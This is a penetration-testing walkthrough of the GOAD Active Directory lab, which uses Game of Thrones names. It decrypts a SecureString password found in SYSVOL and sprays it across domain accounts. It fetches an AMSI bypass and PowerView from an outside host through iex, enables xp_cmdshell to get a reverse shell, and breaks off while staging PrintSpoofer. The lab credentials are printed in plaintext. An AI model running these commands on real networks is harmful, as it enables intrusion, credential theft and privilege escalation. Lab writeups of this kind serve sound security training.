 ===============================================================
  This function automates the following tasks:

  o Determine current computer's domain
  o Enumerate domain computers
  o Check if computers respond to ping requests
  o Filter for computers that have TCP 445 open and accessible
  o Enumerate SMB shares
  o Enumerate SMB share permissions
  o Identify shares with potentially excessive privielges
  o Identify shares that provide read or write access
  o Identify shares thare are high risk
  o Identify common share owners, names, & directory listings
  o Generate last written & last accessed timelines
  o Generate html summary report and detailed csv files

  Note: This can take hours to run in large environments.
 ---------------------------------------------------------------
 |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
 ---------------------------------------------------------------
 SHARE DISCOVERY
 ---------------------------------------------------------------
 [*][04/08/2026 07:59] Scan Start
 [*][04/08/2026 07:59] Output Directory: c:\users\jon.snow\desktop\shared\SmbShareHunt-04082026075916
 [*][04/08/2026 07:59] Successful connection to domain controller: winterfell.north.sevenkingdoms.local
 [*][04/08/2026 07:59] Performing LDAP query for computers associated with the north.sevenkingdoms.local domain
 [*][04/08/2026 07:59] - 2 computers found
<snip>
 [*][04/08/2026 08:00]   - Generating HTML Report
 [*][04/08/2026 08:00]   - Estimated generation time: 1 minute or less
 [*][04/08/2026 08:00]   - All files written to c:\users\jon.snow\desktop\shared\SmbShareHunt-04082026075916
 [*][04/08/2026 08:00]   - Done.


PS C:\Users\jon.snow\Desktop\Shared>

In the share \\castleblack\all we find arya.txt:

Subject: Quick Departure
Hey Arya,
I hope this message finds you well. Something urgent has come up, and I have to leave for a while. Don't worry; I'll be back soon.
I left a little surprise for you in your room – the sword You've named "Needle." It felt fitting, given your skills. Take care of it, and it'll take care of you.
I'll explain everything when I return. Until then, stay sharp, sis.

Best,
John

 

From castleblack, jon.snow can also browse \\WINTERFELL.north.sevenkingdoms.local and there find:

\\WINTERFELL.north.sevenkingdoms.local\SYSVOL\north.sevenkingdoms.local\scripts\script.ps1
# fake script in netlogon with creds
$task = '/c TODO'
$taskName = "fake task"
$user = "NORTH\jeor.mormont"
$password = "_L0ngCl@w_"


# passwords in sysvol still …

\\WINTERFELL.north.sevenkingdoms.local\SYSVOL\north.sevenkingdoms.local\scripts\secret.ps1

# cypher script
# $domain="sevenkingdoms.local"
# $EncryptionKeyBytes = New-Object Byte[] 32
# [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)
# $EncryptionKeyBytes | Out-File "encryption.key"
# $EncryptionKeyData = Get-Content "encryption.key"
# Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"

# secret stored :
$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
$secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="

# T.L

Decrypt the secret using the encryption key provided in the same file…

PS C:\Users\> # The 32-byte (256-bit) AES encryption key provided in the script
PS C:\Users\> $keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
PS C:\Users\>
PS C:\Users\> # The encrypted secret string
PS C:\Users\> $encryptedSecret = "76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="
PS C:\Users\>
PS C:\Users\> # Decrypt the string into a SecureString object using the key
PS C:\Users\> $secureString = ConvertTo-SecureString -String $encryptedSecret -Key $keyData
PS C:\Users\>
PS C:\Users\> # Convert the SecureString object back to plaintext to read it
PS C:\Users\> # This requires using the .NET Marshal class to extract the string from protected memory
PS C:\Users\> $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString)
PS C:\Users\> $plaintext = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
PS C:\Users\> [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
PS C:\Users\>
PS C:\Users\> # Display the decrypted secret
PS C:\Users\> Write-Output "The decrypted secret is:"
The decrypted secret is:
PS C:\Users\> Write-Output $plaintext
powerkingftw135
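The same recovery done offline in Python, as an added example that is not part of the original writeup: it parses the ConvertFrom-SecureString -Key export (the 76492d11… header, then base64 of the UTF-16LE string "2|<base64 IV>|<hex ciphertext>") and decrypts with AES-256-CBC / PKCS#7 using the key that sits in the same script, which is the check a SYSVOL review should make whenever a script ships its key beside the blob. The key and blob are the ones from secret.ps1 above; the pure-Python AES is only there so the check runs with no extra libraries.

```python
import base64

# Header that ConvertFrom-SecureString -Key prepends to its base64 payload.
SECURESTRING_HEADER = "76492d1116743f0423413b16050a5345"
# Leading bytes of a DPAPI blob: what ConvertFrom-SecureString emits without -Key.
DPAPI_HEADER = "01000000d08c9ddf0115d1118c7a00c04fc297eb"

# Sample input: the key and blob copied from secret.ps1 above.
KEY_DATA = [177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247,
            41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91]
SECRET = "76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="

def _gf_mul(a, b):  # multiply in GF(2^8) with the AES polynomial x^8+x^4+x^3+x+1
    r = 0
    while b:
        if b & 1:
            r ^= a
        a = (a << 1) ^ (0x11B if a & 0x80 else 0)
        b >>= 1
    return r

def _build_sbox():  # S-box = affine transform of the multiplicative inverse
    sbox = [0x63] * 256  # S[0] has no inverse; affine(0) = 0x63
    for x in range(1, 256):
        inv = next(y for y in range(1, 256) if _gf_mul(x, y) == 1)
        s = inv
        for k in range(1, 5):  # xor of the four left rotations
            s ^= ((inv << k) | (inv >> (8 - k))) & 0xFF
        sbox[x] = s ^ 0x63
    return sbox

SBOX = _build_sbox()
INV_SBOX = [0] * 256
for _i, _v in enumerate(SBOX):
    INV_SBOX[_v] = _i

def _expand_key(key):  # AES-256 key schedule: 60 words -> 15 round keys
    w = [list(key[i:i + 4]) for i in range(0, 32, 4)]
    rcon = 1
    for i in range(8, 60):
        t = list(w[i - 1])
        if i % 8 == 0:  # RotWord, SubWord, Rcon
            t = [SBOX[b] for b in t[1:] + t[:1]]
            t[0] ^= rcon
            rcon = _gf_mul(rcon, 2)
        elif i % 8 == 4:  # extra SubWord step for 256-bit keys
            t = [SBOX[b] for b in t]
        w.append([a ^ b for a, b in zip(w[i - 8], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(15)]

def _inv_mix_columns(s):
    out = []
    for c in range(4):
        a0, a1, a2, a3 = s[4 * c:4 * c + 4]
        out += [_gf_mul(a0, 14) ^ _gf_mul(a1, 11) ^ _gf_mul(a2, 13) ^ _gf_mul(a3, 9),
                _gf_mul(a0, 9) ^ _gf_mul(a1, 14) ^ _gf_mul(a2, 11) ^ _gf_mul(a3, 13),
                _gf_mul(a0, 13) ^ _gf_mul(a1, 9) ^ _gf_mul(a2, 14) ^ _gf_mul(a3, 11),
                _gf_mul(a0, 11) ^ _gf_mul(a1, 13) ^ _gf_mul(a2, 9) ^ _gf_mul(a3, 14)]
    return out

def _decrypt_block(rk, block):  # state is column-major: index = 4*col + row
    s = [b ^ k for b, k in zip(block, rk[14])]
    for rnd in range(13, -1, -1):
        s = [s[i % 4 + 4 * ((i // 4 - i % 4) % 4)] for i in range(16)]  # InvShiftRows
        s = [INV_SBOX[b] for b in s]                                     # InvSubBytes
        s = [b ^ k for b, k in zip(s, rk[rnd])]                          # AddRoundKey
        if rnd:
            s = _inv_mix_columns(s)
    return bytes(s)

def _aes_cbc_decrypt(key, iv, ct):
    rk = _expand_key(key)
    out, prev = b"", iv
    for i in range(0, len(ct), 16):
        blk = ct[i:i + 16]
        out += bytes(x ^ y for x, y in zip(_decrypt_block(rk, blk), prev))
        prev = blk
    return out[:-out[-1]]  # strip PKCS#7 padding

def parse_securestring_export(blob):
    """Split a -Key export into (version, iv, ciphertext); refuse DPAPI exports."""
    if blob.startswith(DPAPI_HEADER):
        raise ValueError("DPAPI export: bound to the user/machine, no portable key")
    if not blob.startswith(SECURESTRING_HEADER):
        raise ValueError("not a ConvertFrom-SecureString -Key export")
    inner = base64.b64decode(blob[len(SECURESTRING_HEADER):]).decode("utf-16-le")
    version, iv_b64, ct_hex = inner.split("|")
    return version, base64.b64decode(iv_b64), bytes.fromhex(ct_hex)

def recover_secret(blob, key_bytes):
    version, iv, ct = parse_securestring_export(blob)
    if version != "2" or len(key_bytes) != 32:
        raise ValueError("only version-2 exports with a 32-byte (AES-256) key are handled")
    return _aes_cbc_decrypt(bytes(key_bytes), iv, ct).decode("utf-16-le")

if __name__ == "__main__":
    print(recover_secret(SECRET, KEY_DATA))  # powerkingftw135
```

A DPAPI-style export (no -Key) is refused on purpose: it can only be decrypted by the same user on the same machine, so finding one in SYSVOL is a much smaller exposure than a key-based export.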

And now we have what seems to be a password, but we don’t know which username it belongs to. Let’s try a simple password spray; for that we will need a user list for each domain.

nxc ldap 192.168.56.10 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane' --users-export nxc_users_north.seven
nxc ldap 192.168.56.11 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane' --users-export nxc_users_sevenkingdoms.local.txt
nxc ldap 192.168.56.12 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane' --users-export nxc_users_essos.local.txt

.

┌──(bolke㉿kali)-[~/htb]
└─$ nxc ldap 192.168.56.10 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane' --users-export nxc_users_north.seven
LDAP        192.168.56.10   389    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:north.sevenkingdoms.local) (signing:None) (channel binding:Never)
LDAP        192.168.56.10   389    KINGSLANDING     [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
LDAP        192.168.56.10   389    KINGSLANDING     [*] Enumerated 15 domain users: north.sevenkingdoms.local
LDAP        192.168.56.10   389    KINGSLANDING     -Username-                    -Last PW Set-       -BadPW-  -Description-
LDAP        192.168.56.10   389    KINGSLANDING     Administrator                 2026-04-03 14:58:00 2        Built-in account for administering the computer/domain
LDAP        192.168.56.10   389    KINGSLANDING     Guest                         <never>             2        Built-in account for guest access to the computer/domain
LDAP        192.168.56.10   389    KINGSLANDING     vagrant                       2021-05-12 13:38:55 2        Vagrant User
LDAP        192.168.56.10   389    KINGSLANDING     krbtgt                        2026-04-03 15:09:51 2        Key Distribution Center Service Account
LDAP        192.168.56.10   389    KINGSLANDING     tywin.lannister               2026-04-08 11:27:20 0        Tywin Lanister
LDAP        192.168.56.10   389    KINGSLANDING     jaime.lannister               2026-04-08 11:27:27 0        Jaime Lanister
LDAP        192.168.56.10   389    KINGSLANDING     cersei.lannister              2026-04-08 11:27:34 0        Cersei Lanister
LDAP        192.168.56.10   389    KINGSLANDING     tyron.lannister               2026-04-08 11:27:41 0        Tyron Lanister
LDAP        192.168.56.10   389    KINGSLANDING     robert.baratheon              2026-04-08 11:27:48 0        Robert Lanister
LDAP        192.168.56.10   389    KINGSLANDING     joffrey.baratheon             2026-04-08 11:27:56 0        Joffrey Baratheon
LDAP        192.168.56.10   389    KINGSLANDING     renly.baratheon               2026-04-08 11:28:03 0        Renly Baratheon
LDAP        192.168.56.10   389    KINGSLANDING     stannis.baratheon             2026-04-08 11:28:10 0        Stannis Baratheon
LDAP        192.168.56.10   389    KINGSLANDING     petyer.baelish                2026-04-08 11:28:17 0        Petyer Baelish
LDAP        192.168.56.10   389    KINGSLANDING     lord.varys                    2026-04-08 11:28:24 0        Lord Varys
LDAP        192.168.56.10   389    KINGSLANDING     maester.pycelle               2026-04-08 11:28:31 0        Maester Pycelle
LDAP        192.168.56.10   389    KINGSLANDING     [*] Writing 15 local users to nxc_users_north.seven

.

┌──(bolke㉿kali)-[~/htb]
└─$ nxc smb 192.168.56.10 -u nxc_users_north.seven -p powerkingftw135 --continue-on-success
SMB         192.168.56.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\Administrator:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\Guest:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\vagrant:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\krbtgt:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [+] sevenkingdoms.local\tywin.lannister:powerkingftw135
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\jaime.lannister:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\cersei.lannister:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\tyron.lannister:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\robert.baratheon:powerkingftw135 STATUS_ACCOUNT_RESTRICTION
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\joffrey.baratheon:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\renly.baratheon:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\stannis.baratheon:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\petyer.baelish:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\lord.varys:powerkingftw135 STATUS_LOGON_FAILURE
SMB         192.168.56.10   445    KINGSLANDING     [-] sevenkingdoms.local\maester.pycelle:powerkingftw135 STATUS_LOGON_FAILURE

And we have a valid password for sevenkingdoms.local\tywin.lannister.

For sevenkingdoms.local\robert.baratheon the password also seems to be valid, but we get STATUS_ACCOUNT_RESTRICTION instead of a success: even with a correct password, NTLM authentication is refused because robert.baratheon is a member of the Protected Users security group.

Fortunately, the workaround is simple: use Kerberos authentication. For that we need to target the FQDN or DNS hostnames of the domain instead of IP addresses, since Kerberos tickets are tied to names.

Now we can authenticate with Kerberos as sevenkingdoms.local\robert.baratheon, but unfortunately the authentication still fails with this password: the KDC answers KDC_ERR_PREAUTH_FAILED, i.e. the password does not match.

$ nxc smb sevenkingdoms.local -u robert.baratheon -p powerkingftw135 -k
SMB         sevenkingdoms.local 445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         sevenkingdoms.local 445    KINGSLANDING     [-] sevenkingdoms.local\robert.baratheon:powerkingftw135 KDC_ERR_PREAUTH_FAILED


Powerview enum : https://1337skills.com/cheatsheets/powerview/

# Download dev branch (more features)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1" -OutFile "PowerView-dev.ps1"
Import-Module .\PowerView-dev.ps1

.

I use

iex (iwr http://178.224.123.45:8888/amsibypass.txt -UseBasicParsing)
iex ((New-Object Net.WebClient).DownloadString('http://178.224.123.45:8888/PowerView.ps1'))
Get-NetUser

.

PS C:\Users\jon.snow> Get-NetDomain


Forest                  : sevenkingdoms.local
DomainControllers       : {winterfell.north.sevenkingdoms.local}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : sevenkingdoms.local
PdcRoleOwner            : winterfell.north.sevenkingdoms.local
RidRoleOwner            : winterfell.north.sevenkingdoms.local
InfrastructureRoleOwner : winterfell.north.sevenkingdoms.local
Name                    : north.sevenkingdoms.local



PS C:\Users\jon.snow> Get-DomainController


Forest                     : sevenkingdoms.local
CurrentTime                : 4/9/2026 8:43:04 AM
HighestCommittedUsn        : 24083
OSVersion                  : Windows Server 2019 Datacenter Evaluation
Roles                      : {PdcRole, RidRole, InfrastructureRole}
Domain                     : north.sevenkingdoms.local
IPAddress                  : 192.168.56.11
SiteName                   : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections         : {a39c8584-f261-437e-b898-3a5334e751f1}
OutboundConnections        : {5b10dcf9-a3d0-4949-b38b-cc9d67ca37e0}
Name                       : winterfell.north.sevenkingdoms.local
Partitions                 : {CN=Configuration,DC=sevenkingdoms,DC=local,
                             CN=Schema,CN=Configuration,DC=sevenkingdoms,DC=local,
                             DC=ForestDnsZones,DC=sevenkingdoms,DC=local, DC=north,DC=sevenkingdoms,DC=local...}



PS C:\Users\jon.snow> Get-DomainPolicy


Unicode        : @{Unicode=yes}
SystemAccess   : @{MinimumPasswordAge=1; MaximumPasswordAge=37201; MinimumPasswordLength=5; PasswordComplexity=0;
                 PasswordHistorySize=24; LockoutBadCount=5; ResetLockoutCount=5; LockoutDuration=5;
                 RequireLogonToChangePassword=0; ForceLogoffWhenHourExpire=0; ClearTextPassword=0;
                 LSAAnonymousNameLookup=0}
KerberosPolicy : @{MaxTicketAge=10; MaxRenewAge=7; MaxServiceAge=600; MaxClockSkew=5; TicketValidateClient=1}
Version        : @{signature="$CHICAGO$"; Revision=1}
RegistryValues : @{MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=System.Object[]}
Path           : \\north.sevenkingdoms.local\sysvol\north.sevenkingdoms.local\Policies\{31B2F340-016D-11D2-945F-00C04FB
                 984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf
GPOName        : {31B2F340-016D-11D2-945F-00C04FB984F9}
GPODisplayName : Default Domain Policy
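
As an added example (not part of the original writeup), the password and Kerberos settings above audited from the GptTmpl.inf that Get-DomainPolicy reads: the sample is constructed from the values shown, and the weakness thresholds are this example's own choices, not GOAD's or Microsoft's.

```python
import configparser

# Constructed sample: a GptTmpl.inf with the values Get-DomainPolicy returned above.
# The real file is UTF-16 under SYSVOL\...\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf;
# registry values are stored as "type,value" (4 = REG_DWORD), which the page shows as System.Object[].
SAMPLE_GPTTMPL = r"""
[Unicode]
Unicode=yes
[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = 37201
MinimumPasswordLength = 5
PasswordComplexity = 0
PasswordHistorySize = 24
LockoutBadCount = 5
ResetLockoutCount = 5
LockoutDuration = 5
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash=4,1
[Version]
signature="$CHICAGO$"
Revision=1
"""

# (section, key, predicate on the integer value, message). Thresholds are this example's choices.
CHECKS = [
    ("System Access", "MinimumPasswordLength", lambda v: v < 14,
     "minimum password length {v} is below 14"),
    ("System Access", "PasswordComplexity", lambda v: v == 0,
     "password complexity requirements are disabled"),
    ("System Access", "MaximumPasswordAge", lambda v: v == -1 or v > 365,
     "maximum password age {v} days: passwords effectively never expire"),
    ("System Access", "LockoutBadCount", lambda v: v == 0,
     "account lockout is disabled"),
    ("System Access", "LockoutDuration", lambda v: 0 < v < 15,
     "lockout duration {v} minutes is short"),
    ("System Access", "ClearTextPassword", lambda v: v == 1,
     "passwords stored with reversible encryption"),
    ("Kerberos Policy", "MaxTicketAge", lambda v: v > 10,
     "TGT lifetime {v} hours exceeds the default of 10"),
    ("Registry Values", r"MACHINE\System\CurrentControlSet\Control\Lsa\NoLMHash", lambda v: v != 1,
     "LM hashes are still stored (NoLMHash != 1)"),
]

def parse_gpttmpl(text):
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case as written in the file
    cp.read_string(text)
    return cp

def load_gpttmpl(path):
    with open(path, encoding="utf-16") as f:  # SecEdit writes the file as UTF-16
        return parse_gpttmpl(f.read())

def audit_password_policy(text):
    """Return [(key, message)] for every setting that trips one of CHECKS."""
    cp = parse_gpttmpl(text)
    findings = []
    for section, key, is_weak, msg in CHECKS:
        if not cp.has_option(section, key):
            continue
        value = int(cp.get(section, key).split(",")[-1])  # "4,1" -> 1, "37201" -> 37201
        if is_weak(value):
            findings.append((key, msg.format(v=value)))
    return findings

if __name__ == "__main__":
    for key, message in audit_password_policy(SAMPLE_GPTTMPL):
        print(f"[weak] {key}: {message}")
```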



PS C:\Users\jon.snow> Get-DomainTrust


SourceName      : north.sevenkingdoms.local
TargetName      : sevenkingdoms.local
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection  : Bidirectional
WhenCreated     : 4/8/2026 6:39:09 AM
WhenChanged     : 4/8/2026 6:39:09 AM



PS C:\Users\jon.snow> Get-DomainUser -Properties samaccountname,description,pwdlastset

pwdlastset            description                                              samaccountname
----------            -----------                                              --------------
4/7/2026 6:08:44 AM   Built-in account for administering the computer/domain   Administrator
12/31/1600 4:00:00 PM Built-in account for guest access to the computer/domain Guest
5/12/2021 4:38:55 AM  Vagrant User                                             vagrant
4/7/2026 11:42:28 PM  Key Distribution Center Service Account                  krbtgt
4/8/2026 2:27:20 AM   Arya Stark                                               arya.stark
4/8/2026 2:27:29 AM   Eddard Stark                                             eddard.stark
4/8/2026 2:27:36 AM   Catelyn Stark                                            catelyn.stark
4/8/2026 2:27:44 AM   Robb Stark                                               robb.stark
4/8/2026 2:27:52 AM   Sansa Stark                                              sansa.stark
4/8/2026 2:27:59 AM   Brandon Stark                                            brandon.stark
4/8/2026 2:28:07 AM   Rickon Stark                                             rickon.stark
4/8/2026 2:28:14 AM   Brainless Giant                                          hodor
4/8/2026 2:28:22 AM   Jon Snow                                                 jon.snow
4/8/2026 2:28:29 AM   Samwell Tarly (Password : Heartsbane)                    samwell.tarly
4/8/2026 2:28:37 AM   Jeor Mormont                                             jeor.mormont
4/8/2026 2:28:45 AM   sql service                                              sql_svc


PS C:\Users\jon.snow>

.

PS C:\Users\jon.snow> Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp

lastlogontimestamp   dnshostname                           operatingsystem
------------------   -----------                           ---------------
4/7/2026 11:43:13 PM winterfell.north.sevenkingdoms.local  Windows Server 2019 Datacenter Evaluation
4/7/2026 11:58:32 PM castelblack.north.sevenkingdoms.local Windows Server 2019 Datacenter Evaluation

.

PS C:\Users\jon.snow> Find-DomainShare

Name           Type Remark                                ComputerName
----           ---- ------                                ------------
ADMIN$   2147483648 Remote Admin                          winterfell.north.sevenkingdoms.local
C$       2147483648 Default share                         winterfell.north.sevenkingdoms.local
IPC$     2147483651 Remote IPC                            winterfell.north.sevenkingdoms.local
NETLOGON          0 Logon server share                    winterfell.north.sevenkingdoms.local
SYSVOL            0 Logon server share                    winterfell.north.sevenkingdoms.local
ADMIN$   2147483648 Remote Admin                          castelblack.north.sevenkingdoms.local
all               0 Basic RW share for all                castelblack.north.sevenkingdoms.local
C$       2147483648 Default share                         castelblack.north.sevenkingdoms.local
IPC$     2147483651 Remote IPC                            castelblack.north.sevenkingdoms.local
public            0 Basic Read share for all domain users castelblack.north.sevenkingdoms.local

.

We also find NORTH\jeor.mormont in the local administrators group of castelblack; if we get his password, we can privesc on castelblack.

C:\Users\jon.snow>hostname
castelblack

C:\Users\jon.snow>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
NORTH\Domain Admins
NORTH\jeor.mormont
vagrant
The command completed successfully.

.


Sharphound

xfreerdp /u:jon.snow /p:iknownothing /d:north /v:192.168.56.22 /cert-ignore
  • we will launch SharpHound to retrieve the domain information
PS C:\Users\jon.snow\desktop\Shared>
Invoke-WebRequest -Uri "http://178.224.123.45:8888/SharpHoundCE.exe" -OutFile "sharphound.exe"
.\sharphound.exe -d north.sevenkingdoms.local -c all --zipfilename bh_north_sevenkingdoms.zip
.\sharphound.exe -d sevenkingdoms.local -c all --zipfilename bh_sevenkingdoms.zip
.\sharphound.exe -d essos.local -c all --zipfilename bh_essos.zip


CASTELBLACK Exploit (Obtaining Administrator Privileges via MSSQL)

jon.snow has access to MSSQL on CASTELBLACK.

bolke@hacky:~/htb$ nxc mssql 192.168.56.10-12 192.168.56.22-23 -u jon.snow -p 'iknownothing'
MSSQL       192.168.56.23   1433   BRAAVOS          [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) (EncryptionReq:False)
MSSQL       192.168.56.22   1433   CASTELBLACK      [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (EncryptionReq:False)
MSSQL       192.168.56.23   1433   BRAAVOS          [-] essos.local\jon.snow:iknownothing (Login failed for user 'BRAAVOS\Guest'. Please try again with or without '--local-auth')
MSSQL       192.168.56.22   1433   CASTELBLACK      [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!)
Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Let’s access MSSQL.

bolke@hacky:~/htb$ mssqlclient.py north.sevenkingdoms.local/jon.snow:iknownothing@castelblack -windows-auth
Impacket v0.14.0.dev0+20260326.150834.76ee8774 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (NORTH\jon.snow  dbo@master)> 

 

Let’s find out who the system administrator is for this server.

SQL (NORTH\jon.snow  dbo@master)> select loginname from syslogins where sysadmin = '1'
loginname                     
---------------------------   
sa                            
NORTH\sql_svc                 
NT SERVICE\SQLWriter          
NT SERVICE\Winmgmt            
NT SERVICE\MSSQL$SQLEXPRESS   
CASTELBLACK\vagrant           
NORTH\jon.snow                
SQL (NORTH\jon.snow  dbo@master)>

.

You can see that the user jon.snow is listed as a sysadmin.

Enable xp_cmdshell and create a reverse shell (you can generate a reverse shell payload at https://www.revshells.com).

First, listen with netcat:

rlwrap nc -lvnp 4444

Next, create a reverse shell in MSSQL.

SQL (NORTH\jon.snow  dbo@master)> sp_configure 'show advanced options', '1'
INFO(CASTELBLACK\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NORTH\jon.snow  dbo@master)> reconfigure
SQL (NORTH\jon.snow  dbo@master)> sp_configure 'xp_cmdshell', 1
INFO(CASTELBLACK\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NORTH\jon.snow  dbo@master)> RECONFIGURE;
SQL (NORTH\jon.snow  dbo@master)> xp_cmdshell powershell -e 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
SQL (-@master)> 

.

When listening, you can get a reverse shell like this:

bolke@hacky:~/htb$ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.56.22 50012

PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Windows\system32> whoami
north\sql_svc
PS C:\Windows\system32> hostname
castelblack
PS C:\Windows\system32> 

 

Let’s look at the privileges north\sql_svc holds. Since SeImpersonatePrivilege is enabled, I will try PrintSpoofer: https://github.com/itm4n/PrintSpoofer

Next, transfer PrintSpoofer (and nc64.exe, which it will launch) to the target over HTTP.

bolke@hacky:~/htb$ python3 -m http.server 8888
